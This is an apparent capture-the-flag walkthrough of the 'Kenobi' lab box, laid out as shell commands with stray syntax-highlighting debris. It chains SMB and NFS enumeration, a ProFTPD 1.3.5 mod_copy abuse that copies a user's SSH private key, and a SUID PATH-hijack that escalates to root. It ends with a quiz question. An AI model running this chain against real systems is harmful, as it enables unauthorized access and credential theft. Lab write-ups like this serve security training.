Kenobi

1606070;"># Step 1: Scan
2nmap -sV -sC TARGET_IP
3606070;"># 21 FTP (ProFTPD 1.3.5)
4606070;"># 22 SSH
5606070;"># 80 HTTP
6606070;"># 111 rpcbind (NFS)
7606070;"># 139/445 SMB
8 
9606070;"># Step 2: SMB Enumeration
10smbclient -L 606070;">//TARGET_IP -N
11606070;"># Found share: anonymous
12 
13smbclient 606070;">//TARGET_IP/anonymous -N
14smb: \> get log.txt
15606070;"># Contains kenobi's SSH key path: /home/kenobi/.ssh/id_rsa
16 
17606070;"># Step 3: Check NFS
18showmount -e TARGET_IP
19606070;"># /var is exported!
20 
21606070;"># Step 4: ProFTPD Exploitation
22606070;"># ProFTPD 1.3.5 has mod_copy vulnerability
23searchsploit proftpd 1.3.5
24 
25606070;"># Connect and copy SSH key to /var
26nc TARGET_IP 21
27SITE CPFR /home/kenobi/.ssh/id_rsa
28SITE CPTO /var/tmp/id_rsa
29 
30606070;"># Step 5: Mount NFS and Get Key
31mkdir /mnt/kenobi
32mount TARGET_IP:/var /mnt/kenobi
33cp /mnt/kenobi/tmp/id_rsa .
34chmod 600 id_rsa
35 
36606070;"># Step 6: SSH Access
37ssh -i id_rsa kenobi@TARGET_IP
38cat user.txt
39 
40606070;"># Step 7: SUID Privilege Escalation
41find / -perm -u=s -type f 2>/dev/null
42606070;"># Found: /usr/bin/menu (unusual!)
43 
44strings /usr/bin/menu
45606070;"># Calls curl without full path
46 
47606070;"># Path manipulation
48cd /tmp
49echo 606070;">#a5d6ff;">'/bin/bash' > curl
50chmod +x curl
51export PATH=/tmp:$PATH
52/usr/bin/menu
53606070;"># Choose option, triggers our fake curl
54606070;"># Root!

What ProFTPD vulnerability was exploited?